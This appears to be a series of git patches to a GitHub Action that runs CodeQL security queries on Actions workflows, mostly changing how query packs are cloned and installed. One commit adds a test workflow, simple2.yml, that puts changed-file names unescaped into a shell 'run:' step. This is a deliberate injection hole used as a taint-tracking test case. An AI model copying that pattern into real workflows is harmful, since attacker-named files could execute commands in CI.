mod); + return result; +}; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.clonePackRepo = exports.runCommandJson = exports.runCommand = exports.newGHConfig = void 0; +const path = __importStar(__nccwpck_require__(1017)); +const core = __importStar(__nccwpck_require__(2186)); +const toolrunner = __importStar(__nccwpck_require__(8159)); +async function newGHConfig() { + return { + path: "", + }; +} +exports.newGHConfig = newGHConfig; +async function runCommand(config, args) { + var bin = path.join(config.path, "gh"); + let output = ""; + var options = { + listeners: { + stdout: (data) => { + output += data.toString(); + }, + }, + }; + await new toolrunner.ToolRunner(bin, args, options).exec(); + core.debug(`Finished running command :: ${bin} ${args.join(" ")}`); + return output.trim(); +} +exports.runCommand = runCommand; +async function runCommandJson(config, args) { + return JSON.parse(await runCommand(config, args)); +} +exports.runCommandJson = runCommandJson; +async function clonePackRepo(gh) { + try { + await runCommand(gh, ["repo", "clone", "GitHubSecurityLab/codeql-actions"]); + return true; + } + catch (error) { + core.warning("Failed to clone pack from GitHub..."); + } + return false; +} +exports.clonePackRepo = clonePackRepo; + + /***/ }), /***/ 6144: @@ -28751,12 +28824,17 @@ exports.run = void 0; const path = __importStar(__nccwpck_require__(1017)); const core = __importStar(__nccwpck_require__(2186)); const cql = __importStar(__nccwpck_require__(950)); +const gh = __importStar(__nccwpck_require__(1772)); /** * The main function for the action. * @returns {Promise} Resolves when the action is complete. */ async function run() { try { + // set up gh + var ghc = await gh.newGHConfig(); + core.debug(`GH CLI found at '${ghc.path}'`); + await gh.runCommand(ghc, ["version"]); // set up codeql var codeql = await cql.newCodeQL(); core.debug(`CodeQL CLI found at '${codeql.path}'`); @@ -28774,10 +28852,13 @@ async function run() { } // download pack core.info(`Downloading CodeQL Actions pack '${codeql.pack}'`); - var pack_downloaded = await cql.downloadPack(codeql); + //var pack_downloaded = await cql.downloadPack(codeql); + var pack_downloaded = await gh.clonePackRepo(ghc); if (pack_downloaded === false) { var action_path = path.resolve(path.join(__dirname, "..", "..", "..")); + core.info(`Pack path: '${action_path}'`); codeql.pack = path.join(action_path, "ql", "src"); + core.info(`Codeql pack path: '${codeql.path}'`); core.info(`Pack defaulting back to local pack: '${codeql.pack}'`); } else { diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index 3826737a0824..85d7e33954d3 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -3,7 +3,6 @@ import * as path from "path"; import * as core from "@actions/core"; import * as toolcache from "@actions/tool-cache"; -import * as github from "@actions/github"; import * as toolrunner from "@actions/exec/lib/toolrunner"; export interface CodeQLConfig { diff --git a/.github/action/src/gh.ts b/.github/action/src/gh.ts new file mode 100644 index 000000000000..4a8fc09ff9c4 --- /dev/null +++ b/.github/action/src/gh.ts @@ -0,0 +1,54 @@ +import * as fs from "fs"; +import * as path from "path"; + +import * as core from "@actions/core"; +import * as toolcache from "@actions/tool-cache"; +import * as toolrunner from "@actions/exec/lib/toolrunner"; + +export interface GHConfig { + // The path to the codeql bundle. + path: string; +} + +export async function newGHConfig(): Promise { + return { + path: "", + }; +} + +export async function runCommand( + config: GHConfig, + args: string[], +): Promise { + var bin = path.join(config.path, "gh"); + let output = ""; + var options = { + listeners: { + stdout: (data: Buffer) => { + output += data.toString(); + }, + }, + }; + + await new toolrunner.ToolRunner(bin, args, options).exec(); + core.debug(`Finished running command :: ${bin} ${args.join(" ")}`); + + return output.trim(); +} + +export async function runCommandJson( + config: GHConfig, + args: string[], +): Promise { + return JSON.parse(await runCommand(config, args)); +} + +export async function clonePackRepo(gh: GHConfig): Promise { + try { + await runCommand(gh, ["repo", "clone", "GitHubSecurityLab/codeql-actions"]); + return true; + } catch (error) { + core.warning("Failed to clone pack from GitHub..."); + } + return false; +} diff --git a/.github/action/src/index.ts b/.github/action/src/index.ts index b1a4fc80c644..99b9d044d8f0 100644 --- a/.github/action/src/index.ts +++ b/.github/action/src/index.ts @@ -1,6 +1,7 @@ import * as path from "path"; import * as core from "@actions/core"; import * as cql from "./codeql"; +import * as gh from "./gh"; /** * The main function for the action. @@ -8,6 +9,13 @@ import * as cql from "./codeql"; */ export async function run(): Promise { try { + // set up gh + var ghc = await gh.newGHConfig(); + + core.debug(`GH CLI found at '${ghc.path}'`); + + await gh.runCommand(ghc, ["version"]); + // set up codeql var codeql = await cql.newCodeQL(); @@ -30,11 +38,14 @@ export async function run(): Promise { // download pack core.info(`Downloading CodeQL Actions pack '${codeql.pack}'`); - var pack_downloaded = await cql.downloadPack(codeql); + //var pack_downloaded = await cql.downloadPack(codeql); + var pack_downloaded = await gh.clonePackRepo(ghc); if (pack_downloaded === false) { var action_path = path.resolve(path.join(__dirname, "..", "..", "..")); + core.info(`Pack path: '${action_path}'`); codeql.pack = path.join(action_path, "ql", "src"); + core.info(`Codeql pack path: '${codeql.path}'`); core.info(`Pack defaulting back to local pack: '${codeql.pack}'`); } else { From e2699c31f8dd9871dd62dafa632ad19f246d0ccf Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 13:56:58 +0100 Subject: [PATCH 041/707] feat(action): clone and install local packs --- .github/action/dist/index.js | 35 ++++++++++++++++++++++++++++++----- .github/action/src/codeql.ts | 21 +++++++++++++++++++++ .github/action/src/gh.ts | 12 ++++++++++-- .github/action/src/index.ts | 5 ++++- 4 files changed, 65 insertions(+), 8 deletions(-) diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index 9c0a19375f43..eb691f27095c 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28596,7 +28596,7 @@ var __importStar = (this && this.__importStar) || function (mod) { return result; }; Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.codeqlDatabaseAnalyze = exports.codeqlDatabaseCreate = exports.downloadPack = exports.runCommandJson = exports.runCommand = exports.newCodeQL = void 0; +exports.codeqlDatabaseAnalyze = exports.codeqlDatabaseCreate = exports.installPack = exports.downloadPack = exports.runCommandJson = exports.runCommand = exports.newCodeQL = void 0; const fs = __importStar(__nccwpck_require__(7147)); const path = __importStar(__nccwpck_require__(1017)); const core = __importStar(__nccwpck_require__(2186)); @@ -28613,10 +28613,15 @@ async function newCodeQL() { }; } exports.newCodeQL = newCodeQL; -async function runCommand(config, args) { +async function runCommand(config, args, cwd) { var bin = path.join(config.path, "codeql"); let output = ""; + var _cwd = process.cwd(); + if (cwd) { + _cwd = cwd; + } var options = { + cwd: cwd, listeners: { stdout: (data) => { output += data.toString(); @@ -28669,6 +28674,19 @@ async function downloadPack(codeql) { return false; } exports.downloadPack = downloadPack; +async function installPack(codeql, path) { + try { + await runCommand(codeql, ["pack", "install"], path); + await runCommand(codeql, ["pack", "install"], path); + return true; + } + catch (error) { + core.warning("Failed to install local packs ..."); + } + core.info("Installed local packs ..."); + return false; +} +exports.installPack = installPack; async function codeqlDatabaseCreate(codeql) { // get runner temp directory for database var temp = process.env["RUNNER_TEMP"]; @@ -28776,9 +28794,14 @@ async function runCommandJson(config, args) { return JSON.parse(await runCommand(config, args)); } exports.runCommandJson = runCommandJson; -async function clonePackRepo(gh) { +async function clonePackRepo(gh, path) { try { - await runCommand(gh, ["repo", "clone", "GitHubSecurityLab/codeql-actions"]); + await runCommand(gh, [ + "repo", + "clone", + "GitHubSecurityLab/codeql-actions", + path, + ]); return true; } catch (error) { @@ -28853,7 +28876,9 @@ async function run() { // download pack core.info(`Downloading CodeQL Actions pack '${codeql.pack}'`); //var pack_downloaded = await cql.downloadPack(codeql); - var pack_downloaded = await gh.clonePackRepo(ghc); + let pack_path = "/tmp/codeql-actions"; + var pack_downloaded = await gh.clonePackRepo(ghc, pack_path); + await cql.installPack(codeql, pack_path); if (pack_downloaded === false) { var action_path = path.resolve(path.join(__dirname, "..", "..", "..")); core.info(`Pack path: '${action_path}'`); diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index 85d7e33954d3..906e7876f663 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -34,10 +34,16 @@ export async function newCodeQL(): Promise { export async function runCommand( config: CodeQLConfig, args: string[], + cwd?: string, ): Promise { var bin = path.join(config.path, "codeql"); let output = ""; + var _cwd: string = process.cwd(); + if (cwd) { + _cwd = cwd; + } var options = { + cwd: cwd, listeners: { stdout: (data: Buffer) => { output += data.toString(); @@ -99,6 +105,21 @@ export async function downloadPack(codeql: CodeQLConfig): Promise { return false; } +export async function installPack( + codeql: CodeQLConfig, + path: string, +): Promise { + try { + await runCommand(codeql, ["pack", "install"], path); + await runCommand(codeql, ["pack", "install"], path); + return true; + } catch (error) { + core.warning("Failed to install local packs ..."); + } + core.info("Installed local packs ..."); + return false; +} + export async function codeqlDatabaseCreate( codeql: CodeQLConfig, ): Promise { diff --git a/.github/action/src/gh.ts b/.github/action/src/gh.ts index 4a8fc09ff9c4..a80f4b4f59c5 100644 --- a/.github/action/src/gh.ts +++ b/.github/action/src/gh.ts @@ -43,9 +43,17 @@ export async function runCommandJson( return JSON.parse(await runCommand(config, args)); } -export async function clonePackRepo(gh: GHConfig): Promise { +export async function clonePackRepo( + gh: GHConfig, + path: string, +): Promise { try { - await runCommand(gh, ["repo", "clone", "GitHubSecurityLab/codeql-actions"]); + await runCommand(gh, [ + "repo", + "clone", + "GitHubSecurityLab/codeql-actions", + path, + ]); return true; } catch (error) { core.warning("Failed to clone pack from GitHub..."); diff --git a/.github/action/src/index.ts b/.github/action/src/index.ts index 99b9d044d8f0..24daf06f537b 100644 --- a/.github/action/src/index.ts +++ b/.github/action/src/index.ts @@ -39,7 +39,10 @@ export async function run(): Promise { // download pack core.info(`Downloading CodeQL Actions pack '${codeql.pack}'`); //var pack_downloaded = await cql.downloadPack(codeql); - var pack_downloaded = await gh.clonePackRepo(ghc); + + let pack_path = "/tmp/codeql-actions"; + var pack_downloaded = await gh.clonePackRepo(ghc, pack_path); + await cql.installPack(codeql, pack_path); if (pack_downloaded === false) { var action_path = path.resolve(path.join(__dirname, "..", "..", "..")); From c58c4e0d54c19514f172ed1787624c44b9888fbd Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 14:06:46 +0100 Subject: [PATCH 042/707] feat(actions): refactor as composite action to be able to pass env vars --- .github/action/dist/index.js | 4 ++-- .github/action/src/codeql.ts | 1 - .github/action/src/gh.ts | 2 +- action.yml | 15 +++++++++++++-- 4 files changed, 16 insertions(+), 6 deletions(-) diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index eb691f27095c..49c029514146 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28678,12 +28678,12 @@ async function installPack(codeql, path) { try { await runCommand(codeql, ["pack", "install"], path); await runCommand(codeql, ["pack", "install"], path); + core.info("Installed local packs ..."); return true; } catch (error) { core.warning("Failed to install local packs ..."); } - core.info("Installed local packs ..."); return false; } exports.installPack = installPack; @@ -30815,4 +30815,4 @@ module.exports = parseParams /******/ module.exports = __webpack_exports__; /******/ /******/ })() -; \ No newline at end of file +; diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index 906e7876f663..38c222cb2a5b 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -116,7 +116,6 @@ export async function installPack( } catch (error) { core.warning("Failed to install local packs ..."); } - core.info("Installed local packs ..."); return false; } diff --git a/.github/action/src/gh.ts b/.github/action/src/gh.ts index a80f4b4f59c5..a4e187053bec 100644 --- a/.github/action/src/gh.ts +++ b/.github/action/src/gh.ts @@ -12,7 +12,7 @@ export interface GHConfig { export async function newGHConfig(): Promise { return { - path: "", + path: "/usr/bin/", }; } diff --git a/action.yml b/action.yml index 03054c195be9..976e35d8f7c5 100644 --- a/action.yml +++ b/action.yml @@ -14,6 +14,17 @@ inputs: description: "SARIF File Output" default: "codeql-actions.sarif" +# runs: +# using: "node16" +# main: ".github/action/dist/index.js" + runs: - using: "node16" - main: ".github/action/dist/index.js" + using: 'composite' + steps: + - name: Do something with context + shell: bash + env: + GH_TOKEN: ${{ github.token }} + run: | + node .github/action/dist/index.js + node ${{ github.action_path }}/.github/action/dist/index.js From e9f30062046c6adbfe8b72ccc6b4b9ad95ac3729 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 14:10:52 +0100 Subject: [PATCH 043/707] fix(actions): pass the qlpack dirs --- .github/action/src/codeql.ts | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index 38c222cb2a5b..1f604f9c89a7 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -107,11 +107,11 @@ export async function downloadPack(codeql: CodeQLConfig): Promise { export async function installPack( codeql: CodeQLConfig, - path: string, + dir: string, ): Promise { try { - await runCommand(codeql, ["pack", "install"], path); - await runCommand(codeql, ["pack", "install"], path); + await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/lib")); + await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/src")); return true; } catch (error) { core.warning("Failed to install local packs ..."); From a94793fc0996065c3deb0fccf3534c684c45c333 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 14:14:53 +0100 Subject: [PATCH 044/707] fix(actions): pass the qlpack dirs --- .github/action/src/codeql.ts | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index 1f604f9c89a7..7cb1dab48e59 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -34,14 +34,15 @@ export async function newCodeQL(): Promise { export async function runCommand( config: CodeQLConfig, args: string[], - cwd?: string, + cwd_arg?: string, ): Promise { var bin = path.join(config.path, "codeql"); let output = ""; - var _cwd: string = process.cwd(); - if (cwd) { - _cwd = cwd; + var cwd: string = process.cwd(); + if (cwd_arg) { + cwd = cwd_arg; } + core.info("Current working directory: " + cwd); var options = { cwd: cwd, listeners: { From 04a2ae9ad34bd3b1bf12b84e596f53bf186326b1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 14:29:03 +0100 Subject: [PATCH 045/707] fix(actions): ql pack installation --- .github/action/src/gh.ts | 3 --- .github/action/src/index.ts | 33 +++++++++++++++++++-------------- 2 files changed, 19 insertions(+), 17 deletions(-) diff --git a/.github/action/src/gh.ts b/.github/action/src/gh.ts index a4e187053bec..668e559e40bf 100644 --- a/.github/action/src/gh.ts +++ b/.github/action/src/gh.ts @@ -1,8 +1,5 @@ -import * as fs from "fs"; import * as path from "path"; - import * as core from "@actions/core"; -import * as toolcache from "@actions/tool-cache"; import * as toolrunner from "@actions/exec/lib/toolrunner"; export interface GHConfig { diff --git a/.github/action/src/index.ts b/.github/action/src/index.ts index 24daf06f537b..aea847298b4d 100644 --- a/.github/action/src/index.ts +++ b/.github/action/src/index.ts @@ -37,24 +37,29 @@ export async function run(): Promise { } // download pack - core.info(`Downloading CodeQL Actions pack '${codeql.pack}'`); - //var pack_downloaded = await cql.downloadPack(codeql); + // core.info(`Downloading CodeQL Actions pack '${codeql.pack}'`); + // var pack_downloaded = await cql.downloadPack(codeql); + core.info(`Cloning CodeQL Actions pack into '${codeql.pack}'`); let pack_path = "/tmp/codeql-actions"; - var pack_downloaded = await gh.clonePackRepo(ghc, pack_path); - await cql.installPack(codeql, pack_path); - - if (pack_downloaded === false) { - var action_path = path.resolve(path.join(__dirname, "..", "..", "..")); - core.info(`Pack path: '${action_path}'`); - codeql.pack = path.join(action_path, "ql", "src"); - core.info(`Codeql pack path: '${codeql.path}'`); - - core.info(`Pack defaulting back to local pack: '${codeql.pack}'`); - } else { - core.info(`Pack downloaded '${codeql.pack}'`); + var pack_cloned = await gh.clonePackRepo(ghc, pack_path); + core.info(`Cloned CodeQL Actions pack into '${pack_path}'`); + + if (pack_cloned === false) { + throw new Error("Could not clone the actions ql pack"); } + core.info(`Installing CodeQL Actions packs from '${pack_path}'`); + var pack_installed = await cql.installPack(codeql, pack_path); + + if (pack_installed === false) { + throw new Error("Could not install the actions ql packs"); + } + + core.info(`Pack path: '${pack_path}'`); + codeql.pack = path.join(pack_path, "ql", "src"); + core.info(`Codeql Queries pack path: '${codeql.pack}'`); + core.info("Creating CodeQL database..."); var database_path = await cql.codeqlDatabaseCreate(codeql); From b11d8dad4905269e6023ae20cfbac501638ef755 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 14:31:07 +0100 Subject: [PATCH 046/707] fix(actions): ql pack installation --- .github/action/dist/index.js | 50 +++++++++++++++++++----------------- 1 file changed, 26 insertions(+), 24 deletions(-) diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index 49c029514146..3d69e1f81ce6 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28613,13 +28613,14 @@ async function newCodeQL() { }; } exports.newCodeQL = newCodeQL; -async function runCommand(config, args, cwd) { +async function runCommand(config, args, cwd_arg) { var bin = path.join(config.path, "codeql"); let output = ""; - var _cwd = process.cwd(); - if (cwd) { - _cwd = cwd; + var cwd = process.cwd(); + if (cwd_arg) { + cwd = cwd_arg; } + core.info("Current working directory: " + cwd); var options = { cwd: cwd, listeners: { @@ -28674,11 +28675,10 @@ async function downloadPack(codeql) { return false; } exports.downloadPack = downloadPack; -async function installPack(codeql, path) { +async function installPack(codeql, dir) { try { - await runCommand(codeql, ["pack", "install"], path); - await runCommand(codeql, ["pack", "install"], path); - core.info("Installed local packs ..."); + await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/lib")); + await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/src")); return true; } catch (error) { @@ -28771,7 +28771,7 @@ const core = __importStar(__nccwpck_require__(2186)); const toolrunner = __importStar(__nccwpck_require__(8159)); async function newGHConfig() { return { - path: "", + path: "/usr/bin/", }; } exports.newGHConfig = newGHConfig; @@ -28874,21 +28874,23 @@ async function run() { throw new Error("CodeQL Yaml extractor not installed"); } // download pack - core.info(`Downloading CodeQL Actions pack '${codeql.pack}'`); - //var pack_downloaded = await cql.downloadPack(codeql); + // core.info(`Downloading CodeQL Actions pack '${codeql.pack}'`); + // var pack_downloaded = await cql.downloadPack(codeql); + core.info(`Cloning CodeQL Actions pack into '${codeql.pack}'`); let pack_path = "/tmp/codeql-actions"; - var pack_downloaded = await gh.clonePackRepo(ghc, pack_path); - await cql.installPack(codeql, pack_path); - if (pack_downloaded === false) { - var action_path = path.resolve(path.join(__dirname, "..", "..", "..")); - core.info(`Pack path: '${action_path}'`); - codeql.pack = path.join(action_path, "ql", "src"); - core.info(`Codeql pack path: '${codeql.path}'`); - core.info(`Pack defaulting back to local pack: '${codeql.pack}'`); - } - else { - core.info(`Pack downloaded '${codeql.pack}'`); - } + var pack_cloned = await gh.clonePackRepo(ghc, pack_path); + core.info(`Cloned CodeQL Actions pack into '${pack_path}'`); + if (pack_cloned === false) { + throw new Error("Could not clone the actions ql pack"); + } + core.info(`Installing CodeQL Actions packs from '${pack_path}'`); + var pack_installed = await cql.installPack(codeql, pack_path); + if (pack_installed === false) { + throw new Error("Could not install the actions ql packs"); + } + core.info(`Pack path: '${pack_path}'`); + codeql.pack = path.join(pack_path, "ql", "src"); + core.info(`Codeql Queries pack path: '${codeql.pack}'`); core.info("Creating CodeQL database..."); var database_path = await cql.codeqlDatabaseCreate(codeql); core.info("Running CodeQL analysis..."); @@ -30815,4 +30817,4 @@ module.exports = parseParams /******/ module.exports = __webpack_exports__; /******/ /******/ })() -; +; \ No newline at end of file From 41639dd0e2707f39c2084a5b1c5d1914161dd401 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 14:37:43 +0100 Subject: [PATCH 047/707] fix(actions): ql pack installation --- .github/action/dist/index.js | 3 --- .github/action/src/index.ts | 4 ---- 2 files changed, 7 deletions(-) diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index 3d69e1f81ce6..c482d87b4f2e 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28873,9 +28873,6 @@ async function run() { core.setFailed("CodeQL Yaml extractor not installed"); throw new Error("CodeQL Yaml extractor not installed"); } - // download pack - // core.info(`Downloading CodeQL Actions pack '${codeql.pack}'`); - // var pack_downloaded = await cql.downloadPack(codeql); core.info(`Cloning CodeQL Actions pack into '${codeql.pack}'`); let pack_path = "/tmp/codeql-actions"; var pack_cloned = await gh.clonePackRepo(ghc, pack_path); diff --git a/.github/action/src/index.ts b/.github/action/src/index.ts index aea847298b4d..717782b555cf 100644 --- a/.github/action/src/index.ts +++ b/.github/action/src/index.ts @@ -36,10 +36,6 @@ export async function run(): Promise { throw new Error("CodeQL Yaml extractor not installed"); } - // download pack - // core.info(`Downloading CodeQL Actions pack '${codeql.pack}'`); - // var pack_downloaded = await cql.downloadPack(codeql); - core.info(`Cloning CodeQL Actions pack into '${codeql.pack}'`); let pack_path = "/tmp/codeql-actions"; var pack_cloned = await gh.clonePackRepo(ghc, pack_path); From b3bab160d2a0e0a07dfdbe757d15cb5de8c19666 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 14:41:21 +0100 Subject: [PATCH 048/707] fix(actions): ql pack installation --- .github/action/src/codeql.ts | 2 ++ action.yml | 1 - 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index 7cb1dab48e59..b999b698d142 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -111,7 +111,9 @@ export async function installPack( dir: string, ): Promise { try { + await runCommand(codeql, ["pack", "download"], path.join(dir, "/ql/lib")); await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/lib")); + await runCommand(codeql, ["pack", "download"], path.join(dir, "/ql/src")); await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/src")); return true; } catch (error) { diff --git a/action.yml b/action.yml index 976e35d8f7c5..ed6eb327a9ed 100644 --- a/action.yml +++ b/action.yml @@ -26,5 +26,4 @@ runs: env: GH_TOKEN: ${{ github.token }} run: | - node .github/action/dist/index.js node ${{ github.action_path }}/.github/action/dist/index.js From 13c5ec07b45eb0eb4a7791df5ead19ee4e48aa94 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 14:41:47 +0100 Subject: [PATCH 049/707] fix(actions): ql pack installation --- .github/action/dist/index.js | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index c482d87b4f2e..b2e5a97f67fc 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28677,7 +28677,9 @@ async function downloadPack(codeql) { exports.downloadPack = downloadPack; async function installPack(codeql, dir) { try { + await runCommand(codeql, ["pack", "download"], path.join(dir, "/ql/lib")); await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/lib")); + await runCommand(codeql, ["pack", "download"], path.join(dir, "/ql/src")); await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/src")); return true; } From 003b8cc8c0f127ee8903484217318fc8d80cdd86 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 14:44:47 +0100 Subject: [PATCH 050/707] fix(actions): ql pack installation --- .github/action/dist/index.js | 4 ++-- .github/action/src/codeql.ts | 12 ++++++++++-- 2 files changed, 12 insertions(+), 4 deletions(-) diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index b2e5a97f67fc..a778f7d0620e 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28677,9 +28677,9 @@ async function downloadPack(codeql) { exports.downloadPack = downloadPack; async function installPack(codeql, dir) { try { - await runCommand(codeql, ["pack", "download"], path.join(dir, "/ql/lib")); + await runCommand(codeql, ["pack", "download", "githubsecuritylab/actions-all"], path.join(dir, "/ql/lib")); await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/lib")); - await runCommand(codeql, ["pack", "download"], path.join(dir, "/ql/src")); + await runCommand(codeql, ["pack", "download", "githubsecuritylab/actions-queries"], path.join(dir, "/ql/src")); await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/src")); return true; } diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index b999b698d142..790eff6eadc6 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -111,9 +111,17 @@ export async function installPack( dir: string, ): Promise { try { - await runCommand(codeql, ["pack", "download"], path.join(dir, "/ql/lib")); + await runCommand( + codeql, + ["pack", "download", "githubsecuritylab/actions-all"], + path.join(dir, "/ql/lib"), + ); await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/lib")); - await runCommand(codeql, ["pack", "download"], path.join(dir, "/ql/src")); + await runCommand( + codeql, + ["pack", "download", "githubsecuritylab/actions-queries"], + path.join(dir, "/ql/src"), + ); await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/src")); return true; } catch (error) { From 8e59fb7558e985661fafe122627e12ba1f16e84c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 14:47:34 +0100 Subject: [PATCH 051/707] fix(actions): ql pack installation --- .github/action/dist/index.js | 2 -- .github/action/src/codeql.ts | 10 --------- .github/workflows/simple2.yml | 42 +++++++++++++++++++++++++++++++++++ 3 files changed, 42 insertions(+), 12 deletions(-) create mode 100644 .github/workflows/simple2.yml diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index a778f7d0620e..c482d87b4f2e 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28677,9 +28677,7 @@ async function downloadPack(codeql) { exports.downloadPack = downloadPack; async function installPack(codeql, dir) { try { - await runCommand(codeql, ["pack", "download", "githubsecuritylab/actions-all"], path.join(dir, "/ql/lib")); await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/lib")); - await runCommand(codeql, ["pack", "download", "githubsecuritylab/actions-queries"], path.join(dir, "/ql/src")); await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/src")); return true; } diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index 790eff6eadc6..7cb1dab48e59 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -111,17 +111,7 @@ export async function installPack( dir: string, ): Promise { try { - await runCommand( - codeql, - ["pack", "download", "githubsecuritylab/actions-all"], - path.join(dir, "/ql/lib"), - ); await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/lib")); - await runCommand( - codeql, - ["pack", "download", "githubsecuritylab/actions-queries"], - path.join(dir, "/ql/src"), - ); await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/src")); return true; } catch (error) { diff --git a/.github/workflows/simple2.yml b/.github/workflows/simple2.yml new file mode 100644 index 000000000000..b40f5eb6ac05 --- /dev/null +++ b/.github/workflows/simple2.yml @@ -0,0 +1,42 @@ +name: CI + +on: + pull_request: + branches: + - main + +jobs: + changed_files: + runs-on: ubuntu-latest + name: Test changed-files + steps: + - uses: actions/checkout@v4 + with: + fetch-depth: 0 + + - name: Get changed files + id: source + uses: tj-actions/changed-files@v40 + + - name: Remove foo from changed files + id: step + uses: mad9000/actions-find-and-replace-string@3 + with: + source: ${{ steps.source.outputs.all_changed_files }} + find: 'foo' + replace: '' + + - name: List all changed files + id: sink + run: | + for file in ${{ steps.step.outputs.value }}; do + echo "$file was changed" + done + + - name: List all changed files + id: no-flow + run: | + for file in ${{ steps.source.outputs.all_changed_files_count }}; do + echo "$file was changed" + done + From 76f245b337149f09bbc1bbacad7f7cd23010452b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 15:34:20 +0100 Subject: [PATCH 052/707] feat(actions): use published actions packs --- .github/action/dist/index.js | 123 +++-------------------------- .github/action/src/codeql.ts | 14 ---- .github/action/src/gh.ts | 59 -------------- .github/action/src/index.ts | 33 +++----- .github/workflows/build.yml | 4 +- ql/lib/codeql/actions/DataFlow.qll | 9 ++- 6 files changed, 27 insertions(+), 215 deletions(-) delete mode 100644 .github/action/src/gh.ts diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index c482d87b4f2e..501ce250969e 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28596,7 +28596,7 @@ var __importStar = (this && this.__importStar) || function (mod) { return result; }; Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.codeqlDatabaseAnalyze = exports.codeqlDatabaseCreate = exports.installPack = exports.downloadPack = exports.runCommandJson = exports.runCommand = exports.newCodeQL = void 0; +exports.codeqlDatabaseAnalyze = exports.codeqlDatabaseCreate = exports.downloadPack = exports.runCommandJson = exports.runCommand = exports.newCodeQL = void 0; const fs = __importStar(__nccwpck_require__(7147)); const path = __importStar(__nccwpck_require__(1017)); const core = __importStar(__nccwpck_require__(2186)); @@ -28675,18 +28675,6 @@ async function downloadPack(codeql) { return false; } exports.downloadPack = downloadPack; -async function installPack(codeql, dir) { - try { - await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/lib")); - await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/src")); - return true; - } - catch (error) { - core.warning("Failed to install local packs ..."); - } - return false; -} -exports.installPack = installPack; async function 